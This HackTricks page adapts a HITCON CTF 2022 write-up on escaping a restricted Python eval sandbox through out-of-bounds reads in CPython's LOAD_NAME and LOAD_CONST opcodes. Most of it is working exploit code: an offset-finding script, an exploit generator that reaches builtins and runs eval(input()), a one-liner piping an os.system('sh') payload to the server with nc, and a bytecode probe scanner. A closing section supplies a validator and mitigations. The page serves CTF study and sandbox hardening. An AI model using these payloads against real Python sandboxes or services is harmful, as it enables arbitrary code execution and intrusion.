LOAD_NAME / LOAD_CONST opcode OOB Read
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
This information was taken from Splitline's HITCON CTF 2022 writeup: https://blog.splitline.tw/hitcon-ctf-2022/
TL;DR
We can use the OOB read feature in the LOAD_NAME / LOAD_CONST opcodes to get some symbol in memory. This means using a trick like (a, b, c, ... hundreds of symbols ..., __getattribute__) if [] else [].__getattribute__(...) to get the symbol (such as a function name) you want.
Then just craft your exploit.
Overview
The source code is pretty short: it contains only 4 lines!
source = input('>>> ')
if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
print(eval(code, {'__builtins__': {}}))
You can input arbitrary Python code, and it will be compiled to a Python code object. However, co_consts and co_names of that code object are replaced with an empty tuple before the code object is evaluated.
So any expression that contains consts (e.g. numbers, strings, etc.) or names (e.g. variables, functions) may end in a segmentation fault.
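A minimal sketch of what the challenge does to the code object, using a made-up expression and the placeholder filename <demo> (both are assumptions for illustration). It only inspects the objects and deliberately never evaluates the stripped one, since that may crash the interpreter.

```python
# Compile a small expression, then strip its tables the way the challenge does.
original = compile("[a, b, c]", "<demo>", "eval")
stripped = original.replace(co_consts=(), co_names=())

print(original.co_names)                      # names the bytecode indexes into
print(stripped.co_names, stripped.co_consts)  # both tables are now empty
print(stripped.co_code == original.co_code)   # the instructions themselves are unchanged
```

The bytecode still carries the same numeric operands, so nothing in the stripped object records that the tables it points into are gone.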
Out of Bound Read
How does the segfault happen?
Let's start with a simple example: [a, b, c] could compile into the following bytecode.
1 0 LOAD_NAME 0 (a)
2 LOAD_NAME 1 (b)
4 LOAD_NAME 2 (c)
6 BUILD_LIST 3
8 RETURN_VALUE
But what if co_names becomes an empty tuple? The LOAD_NAME 2 opcode is still executed, and it tries to read a value from the memory address where the name originally should have been. Yes, this is an out-of-bound read "feature".
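The mismatch can be made visible without running anything dangerous. The sketch below (expression and filename are illustrative assumptions) disassembles the original code object, whose bytecode is identical to the stripped one, and compares the indexes used by LOAD_NAME with the length of the emptied co_names.

```python
import dis

code = compile("[a, b, c]", "<demo>", "eval")
stripped = code.replace(co_names=())

# Disassemble the original object: dis can still resolve names there, and the
# bytecode is the same. LOAD_NAME's operand is a plain index into co_names.
used = [ins.arg for ins in dis.get_instructions(code) if ins.opname == "LOAD_NAME"]

print("indexes used by LOAD_NAME:", used)
print("entries left in co_names:", len(stripped.co_names))
print("out-of-bounds indexes:", [i for i in used if i >= len(stripped.co_names)])
```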
The core idea of the solution is simple. Some opcodes in CPython, such as LOAD_NAME and LOAD_CONST, are vulnerable (?) to OOB reads.
They retrieve an object at index oparg from the consts or names tuple (that is what co_consts and co_names are called under the hood). We can look at the following short snippet to see what CPython does when it processes the LOAD_CONST opcode.
case TARGET(LOAD_CONST): {
    PREDICTED(LOAD_CONST);
    PyObject *value = GETITEM(consts, oparg);
    Py_INCREF(value);
    PUSH(value);
    FAST_DISPATCH();
}
This way we can use the OOB feature to get a "name" from an arbitrary memory offset. To find out which name sits at which offset, just keep trying LOAD_NAME 0, LOAD_NAME 1 ... LOAD_NAME 99 ... You may start finding something at around oparg > 700. You could of course also use gdb to look at the memory layout, but I don't think that would be any easier?
Generating the Exploit
Once we have retrieved those useful offsets for names / consts, how do we get a name / const from that offset and use it? Here is a trick for you:
Let's assume we can get a __getattribute__ name from offset 5 (LOAD_NAME 5) with co_names=(), then just do the following:
[a,b,c,d,e,__getattribute__] if [] else [
    [].__getattribute__
    # you can get the __getattribute__ method of list object now!
]
Notice that it is not necessary to name it __getattribute__; you can give it a shorter or weirder name.
You can understand the reason behind this by looking at its bytecode:
0 BUILD_LIST 0
2 POP_JUMP_IF_FALSE 20
>> 4 LOAD_NAME 0 (a)
>> 6 LOAD_NAME 1 (b)
>> 8 LOAD_NAME 2 (c)
>> 10 LOAD_NAME 3 (d)
>> 12 LOAD_NAME 4 (e)
>> 14 LOAD_NAME 5 (__getattribute__)
16 BUILD_LIST 6
18 RETURN_VALUE
20 BUILD_LIST 0
>> 22 LOAD_ATTR 5 (__getattribute__)
24 BUILD_LIST 1
26 RETURN_VALUE
Notice that LOAD_ATTR also retrieves its name from co_names. Python loads a name from the same offset whenever the name is the same, so the second __getattribute__ is still loaded from offset=5. Using this feature we can use an arbitrary name once that name is somewhere in nearby memory.
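The shared slot can be checked directly on the compiler's output. This is a small sketch using the same expression as above (the filename <demo> is a placeholder); it only compiles the source and inspects co_names.

```python
src = "[a,b,c,d,e,__getattribute__] if [] else [[].__getattribute__]"
code = compile(src, "<demo>", "eval")

print(code.co_names)
print(code.co_names.index("__getattribute__"))  # slot used by both LOAD_NAME and LOAD_ATTR
print(code.co_names.count("__getattribute__"))  # the name is stored once, not twice
```

Because the dead branch is compiled first, it fixes the position of each name in co_names; the live branch then reuses those positions.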
Generating numbers should be trivial:
- 0: not [[]]
- 1: not []
- 2: (not []) + (not [])
- ...
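The number trick can be sketched as a small helper. The function name num is an assumption for illustration; the construction mirrors the one used by the exploit generator further down.

```python
def num(n):
    """Build an expression equal to n from 'not', '[]' and '+' only."""
    if n == 0:
        return "(not[[]])"  # a non-empty list is truthy, so this is False, i.e. 0
    return "(" + "+".join(["(not[])"] * n) + ")"  # n copies of True, summed

expr = num(5)
code = compile(expr, "<demo>", "eval")
print(expr)
print(code.co_names)                     # the expression references no names
print(eval(code, {"__builtins__": {}}))  # and evaluates without any builtins
```

Note that num(0) and num(1) evaluate to False and True rather than int objects; both still work as list indexes.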
Exploit Script
I didn't use consts because of the length limit.
First, here is a script that helps us find those name offsets.
from types import CodeType
from opcode import opmap
from sys import argv


class MockBuiltins(dict):
    # Echo back any string key, so a name lookup that falls through to
    # builtins returns the name itself instead of raising NameError.
    def __getitem__(self, k):
        if type(k) == str:
            return k


if __name__ == '__main__':
    n = int(argv[1])

    code = [
        *([opmap['EXTENDED_ARG'], n // 256]
          if n // 256 != 0 else []),
        opmap['LOAD_NAME'], n % 256,
        opmap['RETURN_VALUE'], 0
    ]

    # The positional arguments follow the CodeType signature of Python 3.8-3.10.
    c = CodeType(
        0, 0, 0, 0, 0, 0,
        bytes(code),
        (), (), (), '<sandbox>', '<eval>', 0, b'', ()
    )

    ret = eval(c, {'__builtins__': MockBuiltins()})
    if ret:
        print(f'{n}: {ret}')

# for i in $(seq 0 10000); do python find.py $i ; done
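The shell loop above starts a fresh interpreter per index because a bad offset can kill the process. The same idea can be sketched in Python; the function name scan, its parameters and the 5-second timeout are assumptions for illustration, and find.py is the script name used in the loop.

```python
import subprocess
import sys

def scan(script, indexes, timeout=5):
    """Run `script <n>` in a fresh interpreter per index and collect its output."""
    hits, crashes = {}, []
    for n in indexes:
        try:
            proc = subprocess.run([sys.executable, script, str(n)],
                                  capture_output=True, text=True, timeout=timeout)
        except subprocess.TimeoutExpired:
            crashes.append(n)
            continue
        if proc.returncode != 0:      # killed by a signal (e.g. segfault) or exited with an error
            crashes.append(n)
        elif proc.stdout.strip():     # the probe printed "<n>: <name>"
            hits[n] = proc.stdout.strip()
    return hits, crashes

# Example (not run here): hits, crashes = scan("find.py", range(0, 10000))
```

Keeping the list of crashing indexes is optional, but it makes it easy to see where the readable region of memory ends.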
And the following script generates the real Python exploit.
import sys
import unicodedata


class Generator:
    # get number
    def __call__(self, num):
        if num == 0:
            return '(not[[]])'
        return '(' + ('(not[])+' * num)[:-1] + ')'

    # get string
    def __getattribute__(self, name):
        try:
            offset = None.__dir__().index(name)
            return f'keys[{self(offset)}]'
        except ValueError:
            offset = None.__class__.__dir__(None.__class__).index(name)
            return f'keys2[{self(offset)}]'


_ = Generator()

names = []
chr_code = 0
for x in range(4700):
    while True:
        chr_code += 1
        char = unicodedata.normalize('NFKC', chr(chr_code))
        if char.isidentifier() and char not in names:
            names.append(char)
            break

offsets = {
    "__delitem__": 2800,
    "__getattribute__": 2850,
    '__dir__': 4693,
    '__repr__': 2128,
}

variables = ('keys', 'keys2', 'None_', 'NoneType',
             'm_repr', 'globals', 'builtins',)

for name, offset in offsets.items():
    names[offset] = name

for i, var in enumerate(variables):
    assert var not in offsets
    names[792 + i] = var

source = f'''[
({",".join(names)}) if [] else [],
None_ := [[]].__delitem__({_(0)}),
keys := None_.__dir__(),
NoneType := None_.__getattribute__({_.__class__}),
keys2 := NoneType.__dir__(NoneType),
get := NoneType.__getattribute__,
m_repr := get(
    get(get([],{_.__class__}),{_.__base__}),
    {_.__subclasses__}
)()[-{_(2)}].__repr__,
globals := get(m_repr, m_repr.__dir__()[{_(6)}]),
builtins := globals[[*globals][{_(7)}]],
builtins[[*builtins][{_(19)}]](
    builtins[[*builtins][{_(28)}]](), builtins
)
]'''.strip().replace('\n', '').replace(' ', '')

print(f"{len(source) = }", file=sys.stderr)
print(source)

# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port
It basically does the following, using the strings we get from the __dir__ method:
getattr = (None).__getattribute__('__class__').__getattribute__
builtins = getattr(
getattr(
getattr(
[].__getattribute__('__class__'),
'__base__'),
'__subclasses__'
)()[-2],
'__repr__').__getattribute__('__globals__')['builtins']
builtins['eval'](builtins['input']())
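The first links of this chain are harmless and can be tried in a normal interpreter. The sketch below uses ordinary variable names and string lookups where the payload uses precomputed numeric indexes; those substitutions are assumptions made for readability.

```python
# list.__delitem__ returns None, so this yields None without a constant.
none_ = [[]].__delitem__(0)
keys = none_.__dir__()                   # attribute names of None, as strings
cls = keys[keys.index("__class__")]      # the payload hard-codes this index instead

none_type = none_.__getattribute__(cls)  # type(None)
get = none_type.__getattribute__         # behaves like a generic getattr(obj, name)

list_type = get([], cls)                 # [].__class__
base = get(list_type, "__base__")        # list.__base__
print(none_ is None, none_type, list_type, base)
```

From the base class the real payload continues through __subclasses__(), a __repr__ method and its __globals__, which depend on the target interpreter and are not reproduced here.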
Version notes and affected opcodes (Python 3.11–3.13)
- CPython bytecode opcodes still index into the co_consts and co_names tuples using integer operands. If an attacker can force these tuples to be empty (or shorter than the highest index used by the bytecode), the interpreter reads out-of-bounds memory for that index and yields an arbitrary PyObject pointer from nearby memory. Relevant opcodes include at least:
  - LOAD_CONST consti → reads co_consts[consti].
  - LOAD_NAME namei, STORE_NAME, DELETE_NAME, LOAD_GLOBAL, STORE_GLOBAL, IMPORT_NAME, IMPORT_FROM, LOAD_ATTR, STORE_ATTR → read names from co_names[...] (note that LOAD_GLOBAL since 3.11 and LOAD_ATTR since 3.12 store a flag in the low bit of the operand; the actual index is namei >> 1). See the disassembler docs for the exact semantics per version. [Python dis docs].
- Python 3.11+ introduced adaptive/inline caches that add hidden CACHE entries between instructions. This doesn't change the OOB primitive; it only means that if you handcraft bytecode, you must account for those cache entries when building co_code.
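The low-bit encoding can be observed with dis on an ordinary function. This is a sketch: the helper name_index and the function sample are made up for illustration, and the version cut-offs follow the dis documentation as summarised in the list above.

```python
import dis
import sys

def name_index(opname, arg):
    """Recover the co_names index from a raw operand."""
    if opname == "LOAD_GLOBAL" and sys.version_info >= (3, 11):
        return arg >> 1
    if opname == "LOAD_ATTR" and sys.version_info >= (3, 12):
        return arg >> 1
    return arg

def sample(x):
    return len, x.real

decoded = []
for ins in dis.get_instructions(sample):
    if ins.opname in ("LOAD_GLOBAL", "LOAD_ATTR"):
        idx = name_index(ins.opname, ins.arg)
        decoded.append((ins.opname, idx, ins.argval))
        print(ins.opname, "raw arg:", ins.arg, "index:", idx,
              "->", sample.__code__.co_names[idx])
```

When hunting for offsets with these two opcodes, the operand you write into co_code therefore has to be the shifted form of the index you actually want.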
Practical takeaway: the technique on this page keeps working on CPython 3.11, 3.12 and 3.13 whenever you can control a code object (for example via CodeType.replace(...)) and shrink co_consts/co_names.
Quick scanner for useful OOB indexes (3.11+/3.12+ compatible)
If you prefer to probe for interesting objects directly from bytecode rather than from high-level source, you can generate minimal code objects and brute-force the indexes. The helper below automatically inserts inline caches where needed.
import dis

def n_caches(opname):
    # dis._inline_cache_entries is a private CPython table, so this is best effort:
    # it appears to be a list indexed by opcode on 3.11/3.12 and a dict keyed by
    # opname on 3.13.
    table = getattr(dis, "_inline_cache_entries", None)
    if isinstance(table, dict):
        return table.get(opname, 0)
    if table is not None:
        return table[dis.opmap[opname]]
    return 0

def assemble(ops):
    # ops: list of (opname, arg) pairs; arg must fit in one byte (0-255)
    cache = bytes([dis.opmap.get("CACHE", 0), 0])
    out = bytearray()
    for op, arg in ops:
        out += bytes([dis.opmap[op], arg])
        # Python >=3.11 expects inline cache entries after some opcodes
        out += cache * n_caches(op)
    return bytes(out)

# Reuse an existing function's code layout to simplify CodeType construction
base = (lambda: None).__code__

# Example: probe co_consts[i] with LOAD_CONST i and return it
# co_consts/co_names are intentionally empty so LOAD_* goes OOB
def probe_const(i):
    code = assemble([
        ("RESUME", 0),  # 3.11+
        ("LOAD_CONST", i),
        ("RETURN_VALUE", 0),
    ])
    c = base.replace(co_code=code, co_consts=(), co_names=())
    try:
        return eval(c)
    except Exception:
        return None

# An OOB read can crash the interpreter outright; try/except cannot catch that.
for idx in range(0, 256):
    obj = probe_const(idx)
    if obj is not None:
        print(idx, type(obj), repr(obj)[:80])
Notes
- To probe names instead, swap LOAD_CONST for LOAD_NAME/LOAD_GLOBAL/LOAD_ATTR and adjust your stack usage accordingly.
- Use EXTENDED_ARG or multiple arg bytes to reach indexes >255 if needed. When building with dis as above, you only control the low byte; for larger indexes, construct the raw bytes yourself or split the attack across multiple loads.
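For indexes above 255, one possible encoding is sketched below. The helper name emit is an assumption; it emits one EXTENDED_ARG prefix per higher byte of the operand, the same scheme the find script uses for a single extra byte, and it does not append any CACHE entries.

```python
import dis

def emit(opname, arg):
    """Encode one instruction, prefixing EXTENDED_ARG for each byte above the low one."""
    ext = dis.opmap["EXTENDED_ARG"]
    out = bytearray()
    for shift in (24, 16, 8):
        if arg >> shift:  # some higher byte is set, so this prefix is needed
            out += bytes([ext, (arg >> shift) & 0xFF])
    out += bytes([dis.opmap[opname], arg & 0xFF])
    return bytes(out)

print(emit("LOAD_NAME", 700).hex())  # EXTENDED_ARG 2, then LOAD_NAME 188 (2*256 + 188 = 700)
```

If the opcode you target carries inline caches on your Python version, the CACHE entries still have to follow the final instruction.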
Minimal bytecode-only RCE pattern (co_consts OOB → builtins → eval/input)
Once you have identified a co_consts index that resolves to the builtins module, you can reconstruct eval(input()) without any co_names by manipulating the stack:
# Build co_code that:
# 1) LOAD_CONST <builtins_idx> → push builtins module
# 2) Use stack shuffles and BUILD_TUPLE/UNPACK_EX to peel strings like 'input'/'eval'
# out of objects living nearby in memory (e.g., from method tables),
# 3) BINARY_SUBSCR to do builtins["input"] / builtins["eval"], CALL each, and RETURN_VALUE
# This pattern is the same idea as the high-level exploit above, but expressed in raw bytecode.
This technique is useful in challenges that give you direct control over co_code while forcing co_consts=() and co_names=() (for example, BCTF 2024 “awpcode”). It avoids source-level tricks and keeps the payload small by relying on bytecode stack operations and tuple builders.
Defensive checks and mitigations for sandboxes
If you are writing a Python “sandbox” that compiles/evaluates untrusted code or manipulates code objects, do not rely on CPython to bounds-check the tuple indexes used by bytecode. Instead, validate code objects yourself before executing them.
Practical validator (rejects OOB access to co_consts/co_names)
import dis
import sys
from types import CodeType

# Not exhaustive: newer versions add more opcodes (compare dis.hasname / dis.hasconst).
NAME_OPS = {"LOAD_NAME", "STORE_NAME", "DELETE_NAME", "IMPORT_NAME", "IMPORT_FROM",
            "LOAD_ATTR", "STORE_ATTR", "DELETE_ATTR",
            "LOAD_GLOBAL", "STORE_GLOBAL", "DELETE_GLOBAL"}

def max_name_index(code):
    max_idx = -1
    for ins in dis.get_instructions(code):
        if ins.opname in NAME_OPS:
            namei = ins.arg or 0
            # LOAD_GLOBAL (3.11+) and LOAD_ATTR (3.12+) encode a flag in the low bit
            if ((ins.opname == "LOAD_GLOBAL" and sys.version_info >= (3, 11)) or
                    (ins.opname == "LOAD_ATTR" and sys.version_info >= (3, 12))):
                namei >>= 1
            max_idx = max(max_idx, namei)
    return max_idx

def max_const_index(code):
    return max([ins.arg for ins in dis.get_instructions(code)
                if ins.opname == "LOAD_CONST"] + [-1])

def validate_code_object(code: CodeType):
    try:
        max_const, max_name = max_const_index(code), max_name_index(code)
    except IndexError:
        # dis may itself fail while resolving an out-of-range index
        raise ValueError("Bytecode refers to an index beyond co_consts/co_names") from None
    if max_const >= len(code.co_consts):
        raise ValueError("Bytecode refers to const index beyond co_consts length")
    if max_name >= len(code.co_names):
        raise ValueError("Bytecode refers to name index beyond co_names length")

# Example use in a sandbox:
# src = input(); c = compile(src, '<sandbox>', 'exec')
# c = c.replace(co_consts=(), co_names=())  # if you really need this, validate the result
# validate_code_object(c)                   # raises ValueError before anything runs
# eval(c, {'__builtins__': {}})
Other mitigation ideas
- Don't allow arbitrary CodeType.replace(...) on untrusted input, or add strict structural checks on the resulting code object.
- Consider running untrusted code in a separate process with OS-level sandboxing (seccomp, job objects, containers) instead of relying on CPython semantics.
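As a rough sketch of the separate-process idea, the helper below evaluates source in a child interpreter so that a crash or hang cannot take down the host. The name run_isolated and the timeout value are assumptions, and this alone is not a sandbox: the OS-level confinement mentioned above still has to wrap the child.

```python
import subprocess
import sys

def run_isolated(source, timeout=5):
    """Run untrusted source in a child interpreter and return (returncode, stdout)."""
    proc = subprocess.run(
        [sys.executable, "-I", "-c", source],  # -I: isolated mode (no env vars, no user site)
        capture_output=True, text=True, timeout=timeout,
    )
    return proc.returncode, proc.stdout

rc, out = run_isolated("print(1 + 1)")
print(rc, out.strip())
```

A non-zero return code (negative on POSIX when the child was killed by a signal) tells the host that the payload crashed, without the host ever touching the attacker's code object.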
References
- Splitline’s HITCON CTF 2022 writeup “V O I D” (origin of this technique and of the high-level exploit chain): https://blog.splitline.tw/hitcon-ctf-2022/
- Python disassembler docs (index semantics for LOAD_CONST/LOAD_NAME/etc., and the low-bit flags of LOAD_GLOBAL/LOAD_ATTR in 3.11+): https://docs.python.org/3.13/library/dis.html